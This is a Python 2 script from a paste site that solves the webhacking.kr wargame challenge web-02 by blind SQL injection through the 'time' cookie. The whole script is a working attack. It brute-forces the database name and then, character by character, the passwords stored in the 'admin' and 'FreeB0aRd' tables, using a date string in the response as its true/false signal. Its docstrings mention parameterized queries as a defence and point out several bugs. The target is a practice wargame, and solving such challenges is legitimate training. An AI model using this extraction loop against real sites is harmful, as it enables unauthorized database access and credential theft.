
Untitled

a guest
Oct 12th, 2017
  1. import re,urllib, urllib2
  2.  
# Target of the exercise: challenge web-02 on the webhacking.kr wargame.
url = "http://webhacking.kr/challenge/web/web-02/"
# Placeholder: replace with your own PHPSESSID value.
cookie = "PHPSESSID"
# Baseline value of the "time" cookie. The probe functions in this script
# embed the same literal in their payloads instead of reading this variable.
time = "1507748649"
lengthDatabase = 0
# Marker searched for in the response body; its presence is treated as
# "the injected condition evaluated true".
MSG_OK = "2070-01-01 09:00:01"

print("***************************************************************************")
print(" SQL BLIND COOKIE ")
print(" Author: phantom0305 ")
print("***************************************************************************")
  12.  
def SolveLengthDatabase():
    """Find the length of the current database name through a boolean oracle.

    For each candidate length 0..99 one request is sent whose ``time`` cookie
    carries the condition ``length(database())=<candidate>``. The first
    candidate whose response body contains ``MSG_OK`` is returned.

    This only works if the server evaluates the ``time`` cookie as part of a
    SQL statement (presumed from the payload shape; the server code is not on
    this page). Validating the cookie as an integer, or binding it as a query
    parameter, removes the true/false signal this loop depends on.

    NOTE: when no candidate matches, ``lengthDB`` is never assigned and the
    final ``return`` raises ``UnboundLocalError``.
    """
    print("Dang tim chieu dai database..")
    for candidate in range(0, 100):
        injected = "1507748649 and length(database())=%d" % candidate
        # Session cookie is sent alongside the modified "time" cookie.
        cookie_header = "time=%s; PHPSESSID=%s;" % (injected, cookie)
        request = urllib2.Request(url, headers={'Cookie': cookie_header})
        try:
            body = urllib2.urlopen(request).read()
        except urllib2.URLError as err:
            # A failed request is reported and the next candidate is tried.
            print(err)
            continue
        # The marker appears only when the injected condition was true.
        if MSG_OK in body:
            lengthDB = candidate
            break
    return lengthDB
  30.  
# Run the length probe and report what it found.
lengthDatabase = SolveLengthDatabase()
print("Chieu Dai cua DATABASE la:%d" % lengthDatabase)
print("***************************************************************************")
# Accumulator that NameDatabase() extends through its ``global`` declaration.
nameDatabase = ""
def NameDatabase():
    """Recover the database name one character at a time.

    For every position 1..``lengthDatabase`` the character codes 33..125 are
    tried in order, each as ``ascii(substring(database(),pos,1))=code`` inside
    the ``time`` cookie. A response containing ``MSG_OK`` confirms the code;
    the character is printed, appended to the module-level ``nameDatabase``
    and the search moves to the next position.

    A position for which no code matches adds nothing, so the returned string
    can be shorter than ``lengthDatabase``. Every character costs up to 93
    sequential requests that differ only in the cookie value, which is the
    kind of burst that request-rate monitoring on the server side can catch.
    """
    global nameDatabase, lengthDatabase
    print("Dang tim Ten DATABASE.. ")
    for position in range(1, lengthDatabase + 1):
        for code in range(33, 126):
            injected = "1507748649 and ascii(substring(database(),%d,1))=%d" % (position, code)
            cookie_header = "time=%s; PHPSESSID=%s" % (injected, cookie)
            request = urllib2.Request(url, headers={'Cookie': cookie_header})
            try:
                body = urllib2.urlopen(request).read()
            except urllib2.URLError as err:
                # A failed request is reported and the next code is tried.
                print(err)
                continue
            if MSG_OK in body:
                letter = chr(code)
                print(letter)
                nameDatabase += letter
                break
    return nameDatabase
  55.  
# Recover the database name and print it.
nameDatabase = NameDatabase()

print("Ten Database: %s" % nameDatabase)
print("***************************************************************************")
  60.  
def findLengthPassword1():
    """Find the length of the ``password`` value in the ``admin`` table.

    Candidates 1..49 are tested in order with the condition
    ``(select length(password) from admin) =<candidate>`` placed in the
    ``time`` cookie. The first candidate whose response contains ``MSG_OK``
    is printed and returned.

    NOTE: the loop variable is returned unconditionally, so when nothing
    matches the caller receives 49 as if it were a confirmed length.
    """
    print("Dang tim length password admin.. ")
    for guess in range(1, 50):
        injected = "1507748649 and (select length(password) from admin) =%d" % (guess)
        cookie_header = "time=%s; PHPSESSID=%s" % (injected, cookie)
        request = urllib2.Request(url, headers={'Cookie': cookie_header})
        try:
            body = urllib2.urlopen(request).read()
        except urllib2.URLError as err:
            # A failed request is reported and the next candidate is tried.
            print(err)
            continue
        if MSG_OK in body:
            print(str(guess))
            break
    return guess
# Length of the admin password as reported by the probe above.
lengthPassadmin = findLengthPassword1()
print("Chieu dai password admin = %d" % lengthPassadmin)
print("***************************************************************************")
  80.  
def findPassword1():
    """Recover the ``password`` value of the ``admin`` table character by character.

    For each position 1..``lengthPassadmin`` the codes 33..125 are tried with
    ``(select ascii(substring(password,pos,1)) from admin) = code`` in the
    ``time`` cookie. When the response contains ``MSG_OK`` the character is
    appended, the partial result is printed and the next position is probed.

    A position with no matching code is skipped silently, so the result may
    be shorter than ``lengthPassadmin``. The approach presumes the cookie
    reaches a SQL statement unescaped (not shown on this page); a
    parameterized query on the server side would make every probe return the
    same response.
    """
    global lengthPassadmin
    recovered = ""
    print("Dang tim password admin.. ")
    for position in range(1, lengthPassadmin + 1):
        for code in range(33, 126):
            injected = "1507748649 and (select ascii(substring(password,%d,1)) from admin) = %d" % (position, code)
            cookie_header = "time=%s; PHPSESSID=%s" % (injected, cookie)
            request = urllib2.Request(url, headers={'Cookie': cookie_header})
            try:
                body = urllib2.urlopen(request).read()
            except urllib2.URLError as err:
                # A failed request is reported and the next code is tried.
                print(err)
                continue
            if MSG_OK in body:
                recovered += chr(code)
                print(recovered)
                break
    return recovered
# Recover the admin password and print it.
passAdmin = findPassword1()
print("PASSWORD cua admin la: %s" % passAdmin)
  105.  
def findLengthPassword2():
    """Find the length of the ``password`` value in the ``FreeB0aRd`` table.

    Candidates 1..49 are tested in order with the condition
    ``(select length(password) from FreeB0aRd) =<candidate>`` placed in the
    ``time`` cookie. The first candidate whose response contains ``MSG_OK``
    is printed and returned.

    NOTE: the loop variable is returned unconditionally, so when nothing
    matches the caller receives 49 as if it were a confirmed length.
    """
    print("Dang tim length password FreeB0aRd.. ")
    for guess in range(1, 50):
        injected = "1507748649 and (select length(password) from FreeB0aRd) =%d" % (guess)
        cookie_header = "time=%s; PHPSESSID=%s" % (injected, cookie)
        request = urllib2.Request(url, headers={'Cookie': cookie_header})
        try:
            body = urllib2.urlopen(request).read()
        except urllib2.URLError as err:
            # A failed request is reported and the next candidate is tried.
            print(err)
            continue
        if MSG_OK in body:
            print(str(guess))
            break
    return guess
# Length of the FreeB0aRd password; read by findPassword2() as a global.
lengthPassFreeB0aRd = findLengthPassword2()
  123.  
  124.  
def findPassword2():
    """Recover the ``password`` value of the ``FreeB0aRd`` table character by character.

    For each position 1..``lengthPassFreeB0aRd`` the codes 33..125 are tried
    with ``(select ascii(substring(password,pos,1)) from FreeB0aRd) = code``
    in the ``time`` cookie. When the response contains ``MSG_OK`` the
    character is appended, the partial result is printed and the next
    position is probed.

    A position with no matching code is skipped silently, so the result may
    be shorter than ``lengthPassFreeB0aRd``.
    """
    global lengthPassFreeB0aRd
    recovered = ""
    print("Dang tim password FreeB0aRd.. ")
    for position in range(1, lengthPassFreeB0aRd + 1):
        for code in range(33, 126):
            injected = "1507748649 and (select ascii(substring(password,%d,1)) from FreeB0aRd) = %d" % (position, code)
            cookie_header = "time=%s; PHPSESSID=%s" % (injected, cookie)
            request = urllib2.Request(url, headers={'Cookie': cookie_header})
            try:
                body = urllib2.urlopen(request).read()
            except urllib2.URLError as err:
                # A failed request is reported and the next code is tried.
                print(err)
                continue
            if MSG_OK in body:
                recovered += chr(code)
                print(recovered)
                break
    return recovered
# Recover the FreeB0aRd password and print it.
passFreeB0aRd = findPassword2()
print("Pass cua bang FreeB0aRd: %s" % passFreeB0aRd)